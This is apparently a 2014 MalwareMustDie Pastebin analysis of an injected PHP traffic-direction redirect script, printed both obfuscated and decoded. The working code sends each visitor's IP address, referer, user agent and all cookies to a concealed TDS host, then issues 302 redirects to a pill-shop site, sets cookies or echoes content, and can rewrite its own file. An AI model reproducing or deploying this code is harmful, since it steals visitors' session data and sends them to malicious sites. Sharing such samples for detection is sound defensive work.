SHARE
TWEET

Evil 302 Cushion TDS Pointing to fbt.yahoo.com/counter.php

MalwareMustDie Apr 24th, 2014 494 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. //#MalwareMUSTDie!! Beware of TDS Redirection with 302 Cushion!!
  2. // Within codes written: http://fbt.yahoo.com/counter.php
  3. // PHP Injected/obfuscated Code Attack
  4. // Related Case: (previously) Rogue 302-Redirector - A (new?) "Cushion Attack", an Attempt to Evade IDS/IPS Signature
  5. //               http://blog.malwaremustdie.org/2013/09/302-redirector-new-cushion-attempt-to.html
  6. // Spotted ITW in several local VPS
  7. // NOTED: The "utilization" of hostname fbt.YAHOO.COM <=== point
  8. // Credit: S. M. & unixfreaxjp / #MMD Japan
  9.  
  10. // Original script:
  11.  
  12. <?$tds="http://fbt.yahoo.com/counter.php";
  13. $password="fff124106f3430";
  14. $g="http://mypillshop.ru";
  15. $esdid="counter3";
  16. $key="zzzzgb54y45yb45tktbwtberheh6e4wh";
  17. ?><?//BREACK//?><?php error_reporting(0);$a=str_split($password.'2','3');
  18. $p='0';$a[3]=str_replace('f','0',$a[3])+3;$p.=$a[4];$p.='.0';$p.=' ';$a[3
  19. ]++;$p.='.0'.$a[2].'.0';$p=str_replace('f','0',$p);$t=str_replace('f','0'
  20. ,$a[1]);$t=$t.';';if($_GET['mode']=='config' and $_GET['key']==$key){echo
  21. '{pkey" value="'.$key.'"}';}if($_GET["mode"]=="setconfig" AND $key==$_GET
  22. ['key']){$sn=explode("/", $_SERVER['SCRIPT_NAME']);foreach($sn as $snn){$
  23. scr=$snn;}$getlpa=file($scr);$jng=$getlpa[0];$v=file($scr);for($i=0;$i<si
  24. zeof($v);$i++)if($i==0) {$ka='<?//BRE';$c=$ka.'ACK//?>';$b = explode($c,
  25. $v[$i]);$v[$i]='<? ?>'.$c.$b[1];}$d=fopen($scr,"w");fputs($d,implode("",$
  26. v));fclose($d);}$s = explode("/", $tds);$s=$s[2];$u=$s;if($p){$s=$p;}$t=s
  27. ubstr($t, 0, strlen($t)-1);$d = fsockopen(str_replace(' ',$a[3]-strlen('
  28.   '),$s).$t, 80, $i, $o, 2);if (!$d) {$f=$g;}else{$h=urlencode('http://'
  29. .$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']);$m=urlencode($_SERVER[HTT
  30. P_REFERER]);$p=urlencode($_SERVER["REMOTE_ADDR"]);$e='no';if($_SERVER["HT
  31. TP_X_FORWARDED_FOR"]){$e='yes';}$r=urlencode($_SERVER['HTTP_USER_AGENT'])
  32. ;foreach($_COOKIE as $key=>$n) {$t=$t."&".$key."=".$n;}$t=urlencode($t);i
  33. f(empty($t)){$t=urlencode($_SERVER['QUERY_STRING']);}$y="GET ".$tds."?dom
  34. =".$h."&ref=".$m."&ip=".$p."&prox=".$e."&agent=".$r."&cookie=".$t."&esdid
  35. =".$esdid." HTTP/1.0\r\nHost: ".$u."\r\nConnection: Close\r\n\r\n";fwrite
  36. ($d, $y);    while (!feof($d)) {$j=fgets($d,128);if ($j=="\r\n" && empty(
  37. $q)){$q = 'do';}if ($q=='do'){$f.=$j;}}fclose ($d);$f=substr($f, 2);}    
  38.    $w = explode("://", $f);If($w[0]=='http'){header('HTTP/1.1 302 Found')
  39. ;header('Location: '.$f);} $x=substr($f,7);if($w[0]=='cook'){$k=explode("
  40. &", $x);foreach($k as $l){$z=explode("=", $l);setcookie($z[0], $z[1]);}}I
  41. f($w[0]=='echo'){echo $x;}?>
  42.  
  43. // Decoded into:
  44.  
  45. <?$tds="http://fbt.yahoo.com/counter.php";
  46. $password="fff124106f3430";
  47. $g="http://mypillshop.ru";
  48. $esdid="counter3";
  49. $key="zzzzgb54y45yb45tktbwtberheh6e4wh";
  50. ?><?//BREACK//?><?php error_reporting(0);
  51. $a = str_split($password . '2', '3');
  52. $p = '0';
  53. $a[3] = str_replace('f', '0', $a[3]) + 3;
  54. $p.= $a[4];
  55. $p.= '.0';
  56. $p.= ' ';
  57. $a[3]++;
  58. $p.= '.0' . $a[2] . '.0';
  59. $p = str_replace('f', '0', $p);
  60. $t = str_replace('f', '0', $a[1]);
  61. $t = $t . ';';
  62. if ($_GET['mode'] == 'config' and $_GET['key'] == $key) {
  63.     echo '{pkey" value="' . $key . '"}';
  64. }
  65. if ($_GET["mode"] == "setconfig" AND $key == $_GET['key']) {
  66.     $sn = explode("/", $_SERVER['SCRIPT_NAME']);
  67.     foreach ($sn as $snn) {
  68.         $scr = $snn;
  69.     }
  70.     $getlpa = file($scr);
  71.     $jng = $getlpa[0];
  72.     $v = file($scr);
  73.     for ($i = 0;$i < sizeof($v);$i++) if ($i == 0) {
  74.         $ka = '<?//BRE';
  75.         $c = $ka . 'ACK//?>';
  76.         $b = explode($c, $v[$i]);
  77.         $v[$i] = '<? ?>' . $c . $b[1];
  78.     }
  79.     $d = fopen($scr, "w");
  80.     fputs($d, implode("", $v));
  81.     fclose($d);
  82. }
  83. $s = explode("/", $tds);
  84. $s = $s[2];
  85. $u = $s;
  86. if ($p) {
  87.     $s = $p;
  88. }
  89. $t = substr($t, 0, strlen($t) - 1);
  90. $d = fsockopen(str_replace(' ', $a[3] - strlen('    '), $s) . $t, 80, $i, $o, 2);
  91. if (!$d) {
  92.     $f = $g;
  93. } else {
  94.     $h = urlencode('http://' . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
  95.     $m = urlencode($_SERVER[HTTP_REFERER]);
  96.     $p = urlencode($_SERVER["REMOTE_ADDR"]);
  97.     $e = 'no';
  98.     if ($_SERVER["HTTP_X_FORWARDED_FOR"]) {
  99.         $e = 'yes';
  100.     }
  101.     $r = urlencode($_SERVER['HTTP_USER_AGENT']);
  102.     foreach ($_COOKIE as $key => $n) {
  103.         $t = $t . "&" . $key . "=" . $n;
  104.     }
  105.     $t = urlencode($t);
  106.     if (empty($t)) {
  107.         $t = urlencode($_SERVER['QUERY_STRING']);
  108.     }
  109.     $y = "GET " . $tds . "?dom=" . $h . "&ref=" . $m . "&ip=" . $p . "&prox=" . $e . "&agent=" . $r . "&cookie=" . $t . "&esdid=" . $esdid . " HTTP/1.0
  110. Host: " . $u . "
  111. Connection: Close
  112.  
  113. ";
  114.     fwrite($d, $y);
  115.     while (!feof($d)) {
  116.         $j = fgets($d, 128);
  117.         if ($j == "
  118. " && empty($q)) {
  119.             $q = 'do';
  120.         }
  121.         if ($q == 'do') {
  122.             $f.= $j;
  123.         }
  124.     }
  125.     fclose($d);
  126.     $f = substr($f, 2);
  127. }
  128. $w = explode("://", $f);
  129. If ($w[0] == 'http') {
  130.     header('HTTP/1.1 302 Found');
  131.     header('Location: ' . $f);
  132. }
  133. $x = substr($f, 7);
  134. if ($w[0] == 'cook') {
  135.     $k = explode("&", $x);
  136.     foreach ($k as $l) {
  137.         $z = explode("=", $l);
  138.         setcookie($z[0], $z[1]);
  139.     }
  140. }
  141. If ($w[0] == 'echo') {
  142.     echo $x;
  143. } ?>
  144.  
  145. ---
  146. #MalwareMustDie!!
RAW Paste Data
Want to get better at JavaScript?
Learn to code JavaScript in 2017
Top